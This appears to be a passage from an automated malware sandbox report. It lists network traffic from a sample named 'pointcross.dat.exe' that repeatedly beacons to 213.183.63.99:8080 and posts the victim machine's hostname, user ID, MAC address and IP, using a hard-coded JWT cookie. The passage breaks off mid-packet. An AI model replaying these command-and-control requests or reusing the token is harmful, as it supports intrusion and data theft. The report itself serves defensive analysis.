Nov 27, 2023 10:13:54.432831049 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.433540106 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.433553934 CET	443	49767	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:54.465456009 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:54.687397003 CET	443	49767	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:54.687856913 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.687901020 CET	443	49767	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:54.688383102 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.688389063 CET	443	49767	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:54.694408894 CET	443	49767	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:54.694566965 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.697483063 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.697716951 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.701437950 CET	443	49767	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:54.749389887 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.749413967 CET	443	49767	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:54.797528982 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.978842020 CET	443	49767	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:54.978964090 CET	443	49767	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:54.979055882 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.979548931 CET	49767	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:54.979573011 CET	443	49767	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:54.979832888 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:55.190088034 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:55.237984896 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:58.191363096 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:58.394511938 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:58.399698019 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:58.399744034 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.399811029 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:58.400387049 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:58.400403976 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.447531939 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:58.654301882 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.654778004 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:58.654807091 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.654902935 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:58.654910088 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.656014919 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.656076908 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:58.656949997 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:58.657006979 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.657061100 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:58.701256990 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.704368114 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:58.704391003 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.751979113 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:58.944960117 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.945053101 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:58.945103884 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:59.241841078 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:59.241872072 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:59.241883993 CET	49768	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:13:59.241889000 CET	443	49768	104.16.133.229	192.168.2.4
Nov 27, 2023 10:13:59.242018938 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:59.449899912 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:59.497509956 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:59.497509956 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:59.655621052 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:13:59.655672073 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:13:59.704533100 CET	8080	49731	213.183.63.99	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2023 10:11:56.882747889 CET	62501	53	192.168.2.4	1.1.1.1
Nov 27, 2023 10:11:57.006921053 CET	53	62501	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 27, 2023 10:11:56.882747889 CET	192.168.2.4	1.1.1.1	0x7d8b	Standard query (0)	cloudflare.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 27, 2023 10:11:57.006921053 CET	1.1.1.1	192.168.2.4	0x7d8b	No error (0)	cloudflare.com		104.16.133.229	A (IP address)	IN (0x0001)	false
Nov 27, 2023 10:11:57.006921053 CET	1.1.1.1	192.168.2.4	0x7d8b	No error (0)	cloudflare.com		104.16.132.229	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cloudflare.com

213.183.63.99:8080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	213.183.63.99	8080	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2023 10:11:57.757246017 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:11:57.959743023 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:11:57 GMT Content-Length: 0
Nov 27, 2023 10:11:58.525336981 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 31 37 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076317}
Nov 27, 2023 10:11:58.735075951 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:11:58 GMT Content-Length: 0
Nov 27, 2023 10:12:01.739635944 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:01.943177938 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:01 GMT Content-Length: 0
Nov 27, 2023 10:12:02.507986069 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 32 31 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076321}
Nov 27, 2023 10:12:02.716562033 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:02 GMT Content-Length: 0
Nov 27, 2023 10:12:05.717449903 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:05.919898033 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:05 GMT Content-Length: 0
Nov 27, 2023 10:12:06.470444918 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 32 35 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076325}
Nov 27, 2023 10:12:06.676805019 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:06 GMT Content-Length: 0
Nov 27, 2023 10:12:09.698476076 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:09.901273966 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:09 GMT Content-Length: 0
Nov 27, 2023 10:12:11.747934103 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 33 30 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076330}
Nov 27, 2023 10:12:11.957448959 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:11 GMT Content-Length: 0
Nov 27, 2023 10:12:14.958559036 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:15.161132097 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:15 GMT Content-Length: 0
Nov 27, 2023 10:12:15.731106997 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 33 34 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076334}
Nov 27, 2023 10:12:15.939544916 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:15 GMT Content-Length: 0
Nov 27, 2023 10:12:18.940629005 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:19.143264055 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:19 GMT Content-Length: 0
Nov 27, 2023 10:12:19.697729111 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 33 38 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076338}
Nov 27, 2023 10:12:19.906207085 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:19 GMT Content-Length: 0
Nov 27, 2023 10:12:22.907408953 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:23.110245943 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:22 GMT Content-Length: 0
Nov 27, 2023 10:12:23.676044941 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 34 32 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076342}
Nov 27, 2023 10:12:23.885622025 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:23 GMT Content-Length: 0
Nov 27, 2023 10:12:27.074321985 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:27.277515888 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:27 GMT Content-Length: 0
Nov 27, 2023 10:12:28.953032017 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 34 37 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076347}
Nov 27, 2023 10:12:29.162070990 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:29 GMT Content-Length: 0
Nov 27, 2023 10:12:32.163367033 CET	357	OUT	GET /health HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip
Nov 27, 2023 10:12:32.366130114 CET	129	IN	HTTP/1.1 200 OK Date: Mon, 27 Nov 2023 09:12:32 GMT Content-Length: 0
Nov 27, 2023 10:12:32.923979998 CET	610	OUT	POST /device HTTP/1.1 Host: 213.183.63.99:8080 User-Agent: Go-http-client/1.1 Content-Length: 231 Content-Type: application/json Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8 Accept-Encoding: gzip Data Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 